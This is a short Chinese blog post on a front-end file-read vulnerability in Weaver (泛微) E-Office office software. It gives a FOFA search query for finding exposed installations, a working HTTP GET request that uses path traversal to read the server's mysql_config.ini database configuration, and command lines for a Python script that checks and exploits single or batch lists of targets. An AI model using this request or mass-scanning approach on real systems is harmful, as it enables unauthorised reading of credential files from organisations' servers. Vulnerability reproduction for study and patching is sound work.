泛微E-Office文件读取漏洞

声明：该文章由作者（Luckygirl.007）发表，转载此文章须经作者同意并请附上出处(0XUCN)及本页链接。。

泛微E-Office是一款企业级的全流程办公自动化软件，它包括协同办公、文档管理、知识管理、工作流管理等多个模块，涵盖了企业日常工作中的各个环节。泛微E-Office能够帮助企业实现全流程数字化、自动化，提高工作效率和管理质量，降低管理成本，为企业提供全面、高效、便捷的办公服务。

泛微E-Office前台文件读取漏洞。

二、网络空间搜索引擎查询

fofa查询

app=“泛微-EOffice”

三、漏洞复现

poc

GET /iweboffice/officeserver2.php?OPTION=LOADTEMPLATE&COMMAND=INSERTFILE&TEMPLATE=../../bin/mysql_config.ini HTTP/1.1Host: ip:portUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36Content-Length: 0

浏览器直接访问返回如下

四、批量检测与利用

单个检测与利用

python .\E-OfficeReadfile.py -u http://ip:port

批量检测

python .\E-OfficeReadfile.py -f filename

[超站]友情链接：

四季很好，只要有你，文娱排行榜：https://www.yaopaiming.com/
关注数据与安全，洞悉企业级服务市场：https://www.ijiandao.com/